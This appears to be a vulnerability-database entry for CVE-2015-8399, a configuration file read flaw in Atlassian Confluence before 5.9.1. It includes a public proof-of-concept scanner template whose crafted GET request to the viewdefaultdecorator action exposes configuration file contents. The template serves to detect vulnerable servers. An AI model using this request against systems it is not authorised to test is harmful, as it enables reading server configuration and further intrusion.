CVE-2015-8399: Atlassian Confluence configuration files read

Date: 2025-09-01 | Affected software: Unknown | PoC: Public

Vulnerability description

Atlassian Confluence before 5.9.1 allows remote attackers to read arbitrary files via a crafted request.

PoC code [public]

id: CVE-2015-8399

info:
  name: Atlassian Confluence configuration files read
  author: whynot
  severity: medium
  description: |-
    Atlassian Confluence before 5.9.1 allows remote attackers to read arbitrary files via a crafted request.
  reference:
    - https://www.elastic.co/community/security
    - https://nvd.nist.gov/vuln/detail/CVE-2015-8399
  tags: cve,cve2015,confluence,fileread
  created: 2023/07/13

rules:
  r0:
    request:
      method: GET
      path: /spaces/viewdefaultdecorator.action?decoratorName
    expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator")
expression: r0()